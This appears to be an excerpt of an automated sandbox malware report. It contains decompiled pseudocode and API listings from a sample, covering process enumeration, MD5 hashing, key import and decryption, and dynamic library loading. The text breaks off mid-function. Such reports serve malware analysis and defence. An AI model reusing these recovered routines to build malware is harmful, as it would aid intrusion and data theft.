                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001d37
                                                                                                                                                                                                                                                                                                        0x04001d3e
                                                                                                                                                                                                                                                                                                        0x04001d5f
                                                                                                                                                                                                                                                                                                        0x04001e3e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001e3e
                                                                                                                                                                                                                                                                                                        0x04001d81
                                                                                                                                                                                                                                                                                                        0x04001d92
                                                                                                                                                                                                                                                                                                        0x04001dac
                                                                                                                                                                                                                                                                                                        0x04001db9
                                                                                                                                                                                                                                                                                                        0x04001dbb
                                                                                                                                                                                                                                                                                                        0x04001dcb
                                                                                                                                                                                                                                                                                                        0x04001dcc
                                                                                                                                                                                                                                                                                                        0x04001dd4
                                                                                                                                                                                                                                                                                                        0x04001dd5
                                                                                                                                                                                                                                                                                                        0x04001ddb
                                                                                                                                                                                                                                                                                                        0x04001ddc
                                                                                                                                                                                                                                                                                                        0x04001de3
                                                                                                                                                                                                                                                                                                        0x04001e05
                                                                                                                                                                                                                                                                                                        0x04001e09
                                                                                                                                                                                                                                                                                                        0x04001e10
                                                                                                                                                                                                                                                                                                        0x04001e11
                                                                                                                                                                                                                                                                                                        0x04001de5
                                                                                                                                                                                                                                                                                                        0x04001de8
                                                                                                                                                                                                                                                                                                        0x04001dec
                                                                                                                                                                                                                                                                                                        0x04001df3
                                                                                                                                                                                                                                                                                                        0x04001dfa
                                                                                                                                                                                                                                                                                                        0x04001dfb
                                                                                                                                                                                                                                                                                                        0x04001dfb
                                                                                                                                                                                                                                                                                                        0x04001e16
                                                                                                                                                                                                                                                                                                        0x04001e21
                                                                                                                                                                                                                                                                                                        0x04001e21
                                                                                                                                                                                                                                                                                                        0x04001db9
                                                                                                                                                                                                                                                                                                        0x04001e27
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001d3e
                                                                                                                                                                                                                                                                                                        0x04001d18
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                                        • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                                        • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 384183238-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                                        • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                                                                                                                                                        			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                                                                                                                        				char* _t36;
                                                                                                                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        						_t37 = GetLastError();
                                                                                                                                                                                                                                                                                                        						_v16 = _t37;
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        							_t39 = _a8;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                                                        							if(_t39 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								_v28 = 4;
                                                                                                                                                                                                                                                                                                        								_t41 =  &_v28;
                                                                                                                                                                                                                                                                                                        								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                                                        								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                                                        									_v32 = _a16;
                                                                                                                                                                                                                                                                                                        									_t43 = _a12;
                                                                                                                                                                                                                                                                                                        									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                                                        									if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        										_v8 = _v32;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x04008bb6
                                                                                                                                                                                                                                                                                                        0x04008bc1
                                                                                                                                                                                                                                                                                                        0x04008ce7
                                                                                                                                                                                                                                                                                                        0x04008ced
                                                                                                                                                                                                                                                                                                        0x04008be5
                                                                                                                                                                                                                                                                                                        0x04008be5
                                                                                                                                                                                                                                                                                                        0x04008bf5
                                                                                                                                                                                                                                                                                                        0x04008bff
                                                                                                                                                                                                                                                                                                        0x04008c07
                                                                                                                                                                                                                                                                                                        0x04008c09
                                                                                                                                                                                                                                                                                                        0x04008c0f
                                                                                                                                                                                                                                                                                                        0x04008c19
                                                                                                                                                                                                                                                                                                        0x04008c2d
                                                                                                                                                                                                                                                                                                        0x04008c38
                                                                                                                                                                                                                                                                                                        0x04008c38
                                                                                                                                                                                                                                                                                                        0x04008c19
                                                                                                                                                                                                                                                                                                        0x04008c42
                                                                                                                                                                                                                                                                                                        0x04008c59
                                                                                                                                                                                                                                                                                                        0x04008c61
                                                                                                                                                                                                                                                                                                        0x04008c65
                                                                                                                                                                                                                                                                                                        0x04008c71
                                                                                                                                                                                                                                                                                                        0x04008c79
                                                                                                                                                                                                                                                                                                        0x04008c7b
                                                                                                                                                                                                                                                                                                        0x04008c82
                                                                                                                                                                                                                                                                                                        0x04008c8b
                                                                                                                                                                                                                                                                                                        0x04008c99
                                                                                                                                                                                                                                                                                                        0x04008ca1
                                                                                                                                                                                                                                                                                                        0x04008cae
                                                                                                                                                                                                                                                                                                        0x04008cb7
                                                                                                                                                                                                                                                                                                        0x04008cc1
                                                                                                                                                                                                                                                                                                        0x04008cc9
                                                                                                                                                                                                                                                                                                        0x04008cce
                                                                                                                                                                                                                                                                                                        0x04008cce
                                                                                                                                                                                                                                                                                                        0x04008cc9
                                                                                                                                                                                                                                                                                                        0x04008ca1
                                                                                                                                                                                                                                                                                                        0x04008cd5
                                                                                                                                                                                                                                                                                                        0x04008cd5
                                                                                                                                                                                                                                                                                                        0x04008ce1
                                                                                                                                                                                                                                                                                                        0x04008ce1
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04008c42

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                                        					L16:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							_v24 = 0;
                                                                                                                                                                                                                                                                                                        							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                        								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                                        								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x04008a76
                                                                                                                                                                                                                                                                                                        0x04008a81
                                                                                                                                                                                                                                                                                                        0x04008ba3
                                                                                                                                                                                                                                                                                                        0x04008ba9
                                                                                                                                                                                                                                                                                                        0x04008ab9
                                                                                                                                                                                                                                                                                                        0x04008ab9
                                                                                                                                                                                                                                                                                                        0x04008ac9
                                                                                                                                                                                                                                                                                                        0x04008ad3
                                                                                                                                                                                                                                                                                                        0x04008adb
                                                                                                                                                                                                                                                                                                        0x04008ae3
                                                                                                                                                                                                                                                                                                        0x04008aed
                                                                                                                                                                                                                                                                                                        0x04008b01
                                                                                                                                                                                                                                                                                                        0x04008b0c
                                                                                                                                                                                                                                                                                                        0x04008b0c
                                                                                                                                                                                                                                                                                                        0x04008aed
                                                                                                                                                                                                                                                                                                        0x04008b16
                                                                                                                                                                                                                                                                                                        0x04008b1c
                                                                                                                                                                                                                                                                                                        0x04008b37
                                                                                                                                                                                                                                                                                                        0x04008b3f
                                                                                                                                                                                                                                                                                                        0x04008b41
                                                                                                                                                                                                                                                                                                        0x04008b66
                                                                                                                                                                                                                                                                                                        0x04008b80
                                                                                                                                                                                                                                                                                                        0x04008b87
                                                                                                                                                                                                                                                                                                        0x04008b87
                                                                                                                                                                                                                                                                                                        0x04008b91
                                                                                                                                                                                                                                                                                                        0x04008b91
                                                                                                                                                                                                                                                                                                        0x04008b9d
                                                                                                                                                                                                                                                                                                        0x04008b9d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04008b16

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 1000104E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(000000C1), ref: 10001096
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                                        • Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                        			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				char* _t27;
                                                                                                                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                                                                                                                        				char* _t47;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t47 =  *0x4013370; // 0x400c6e4
